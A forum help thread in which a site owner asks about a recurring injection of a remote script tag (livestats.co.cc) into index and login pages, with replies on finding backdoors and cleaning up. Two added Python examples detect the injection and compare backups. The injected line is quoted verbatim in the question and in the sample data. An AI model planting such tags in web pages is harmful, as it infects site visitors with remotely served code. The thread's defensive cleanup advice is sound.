sealionstaff

asked on

Virus script found in all index and home page

Hi,
I am currently facing a problem that I can't get any help with from the hosting company, and it's driving me crazy.
All of a sudden, most of my websites on different servers got the same virus, which adds this line of code before the </body> tag of all index, home and login pages, regardless of whether they are PHP or HTML, etc.
This is what it looks like:

<!-- o65 --><script type='text/javascript' src='http://livestats.co.cc/script.js'></script><!-- c65 -->

I tried deleting them, but one or two weeks later they appear again. I also asked the hosting company to scan their server, and they found nothing.

Does anybody have experience with this, or can suggest any solution?
Please help me out. Thank you very much.
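An added example (not from any poster in this thread) of the detection and cleanup step the question is after: it matches the comment-wrapped remote script block quoted above, reports which pages carry it, and strips it. The marker-digit matching, the set of target file names and the sample page are assumptions drawn from the posts.

```python
import re
from pathlib import Path

# Pattern of the injection quoted in the question: an HTML comment pair
# (o<N> ... c<N>) wrapping one remote <script> tag. The digits are matched
# generically and the closing marker must carry the same number.
INJECT_RE = re.compile(
    r"<!--\s*o(\d+)\s*-->\s*<script[^>]*\bsrc=['\"]([^'\"]+)['\"][^>]*>"
    r"\s*</script>\s*<!--\s*c\1\s*-->",
    re.IGNORECASE,
)

# File name stems the posters report as being hit (assumption: match on the
# stem regardless of extension, so index.php, index.htm, login.html qualify)
TARGET_STEMS = {"index", "home", "login", "auth"}

# Constructed sample page carrying the exact line quoted in the question
SAMPLE_PAGE = (
    "<html><body><h1>Shop</h1>\n"
    "<!-- o65 --><script type='text/javascript' "
    "src='http://livestats.co.cc/script.js'></script><!-- c65 -->"
    "</body></html>\n"
)

def find_injections(text):
    """Return [(marker_number, script_src), ...] for every injection in text."""
    return [(m.group(1), m.group(2)) for m in INJECT_RE.finditer(text)]

def clean_text(text):
    """Return text with every injected comment/script/comment block removed."""
    return INJECT_RE.sub("", text)

def scan_pages(pages, targets=TARGET_STEMS):
    """pages: {relative_path: text}. Report infected files (targets=None: all)."""
    hits = {}
    for name, text in pages.items():
        if targets is None or Path(name).stem.lower() in targets:
            found = find_injections(text)
            if found:
                hits[name] = found
    return hits

def scan_tree(root, targets=TARGET_STEMS):
    """Disk wrapper: read the files under root and run scan_pages on them."""
    pages = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and (targets is None or path.stem.lower() in targets):
            pages[str(path)] = path.read_text(errors="replace")
    return scan_pages(pages, targets)
```

Run `scan_tree` against a copy of the web root pulled by FTP; a clean result that turns dirty again a week later points at the write access the later replies discuss, not at the pages themselves.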
lherrou

sealionstaff,

Do you have a Content Management System or other scripts on your website? It sounds like someone is exploiting a hole in some script, accessing your site, and placing the code into your pages.

If you have access to the log files, you might be able to determine where the hackers are coming from, and ask your hosting company to block their IP address out. You also will need to determine which script has the vulnerability and remove or repair it. Also, once the hole has been found, these hackers frequently place their own access tools on the server, so you'll need to look around and see if they've left a backdoor behind.

Cheers,
LHerrou
sealionstaff

ASKER

Hi LHerrou
Thank you very much. I know I sound dumb, but can you give me more detailed instructions on how to look for such a "backdoor" if it exists? I don't have a CMS on this website, but I have osCommerce. But this virus also appears on sites that don't use osCommerce...
Thanks,
Ann
ASKER CERTIFIED SOLUTION
Mohamed Osama
Yes, I have to agree with Admin3k - everything has to be cleaned out. Sometimes the hackers even install within the database for the cart, so when the cart runs, they re-infect all over again. It's also possible (if this is shared hosting) that another account was compromised, and your infection is incidental to that. Your hosting company should be cooperating on this - it's not a virus per se, so they won't find anything with antivirus scans.

Here are a couple more in-depth descriptions of how to handle this:
Specific OS Commerce info:
http://www.oscmax.com/forums/oscmax-v2-customization-mods/16496-website-recently-hacked.html
More general info:
http://25yearsofprogramming.com/blog/20070705.htm
Hi everyone,
Thanks for helping out.
Lherrou, I have a question regarding what you said about "Your hosting company should be cooperating on this - it's not a virus per se, so they won't find anything with antivirus scans."
I agree that we need their help, because it's the same virus on a few different websites we host at the same hosting company. Not all of them have osCommerce, so I kind of guess that it's not the root of the problem (I might be wrong anyway). If they can't find anything with antivirus scans, then what should I ask them to do?
SOLUTION
I'd like to ask a few follow-up questions - this issue is exactly what I have right now.

The attack seems to infect any file named 'index' or 'auth' - so index.php, index.htm, etc.

My un-educated short term fix is to:
hand-edit out the injected extra script (it is always at the bottom) and then change the file permissions from 644 (rw for owner) to 444 (read only - all users).

Since I know little about these things, I assumed that blocking write access by 'owner' meant that one of the 4 PCs I use to admin my site was the source of the infection.

Is that right/wrong/maybe/possible/impossible??

BTW: I basically only find out about the infection when the virus scanner on my PC scans the daily backups of my site. I use AVG Free, and it seems to alert with 2 or 3 specific virus names on those infected files. The AVG knowledge base, though, comes up blank about these viruses (today's was called 'JS/Downloader.Agent', which I guess is just a generic name; some days it mentions a more specific virus name). What is this virus doing?

Is this a host-based thing, or injected from outside? Please could you give a beginner more guidance about finding the source.

Thanks
XXhris,

I encourage you to open your own question on this topic. Having said that, my guess is that this is (or was) injected from the outside. Someone found a vulnerability on your site (or potentially another site that shares the same server), and used that to break in. Once they are in, they are treated as having owner access, so they can continue to re-infect files as they please, or their script / virus automatically does so when it detects that you have deleted it.

First step: Copy all files from your webserver to a local hard drive using FTP.
Second step: Notify your web host, and follow any directions that they may have. This should include changing your FTP password.
Third step: If they give you the OK (they may wish to preserve things for forensic analysis), delete all files on your webserver.
Fourth step: Make sure all files you downloaded are clean (better yet, use an older backup of the site or your originals) and upload again - make sure that any web applications or databases are also secure.

If you feel uncomfortable with any of this, you should utilize the services of a web security consultant, especially if you keep any kind of secure information on your website.

Cheers,
LHerrou
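The fourth step above, as an added example that is not from any poster: hash an older known-good backup and the copy just pulled by FTP, then list what was added, modified or went missing before anything is re-uploaded. The file names, contents and the placeholder script host are constructed.

```python
import hashlib
from pathlib import Path


def hash_file(path):
    """SHA-256 of one file, read in chunks so large uploads are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """{relative_path: sha256} for every regular file under root."""
    root = Path(root)
    return {str(p.relative_to(root)).replace("\\", "/"): hash_file(p)
            for p in root.rglob("*") if p.is_file()}


def diff_trees(known_good, pulled):
    """Compare two {relpath: sha256} maps and return (added, modified, missing):
    files only in the pulled copy (review as possible dropped tools), files
    whose content changed (re-injected pages), and files the pulled copy lacks."""
    added = sorted(set(pulled) - set(known_good))
    missing = sorted(set(known_good) - set(pulled))
    modified = sorted(p for p in set(known_good) & set(pulled)
                      if known_good[p] != pulled[p])
    return added, modified, missing


def _h(data):
    return hashlib.sha256(data).hexdigest()


# Constructed sample: an older clean backup versus the copy pulled by FTP
KNOWN_GOOD = {
    "index.php": _h(b"<html><body>shop</body></html>"),
    "images/logo.gif": _h(b"GIF89a..."),
    "includes/configure.php": _h(b"<?php $db = 'x';"),
}
PULLED = {
    "index.php": _h(b"<html><body>shop<script src='http://example.invalid/s.js'>"
                    b"</script></body></html>"),
    "images/logo.gif": _h(b"GIF89a..."),
    "includes/configure.php": _h(b"<?php $db = 'x';"),
    "images/tmp_upload.php": _h(b"file that is not in the backup"),
}
```

In practice the two maps come from `hash_tree(backup_dir)` and `hash_tree(ftp_pull_dir)`; anything in the added or modified lists needs a look before the site goes back up.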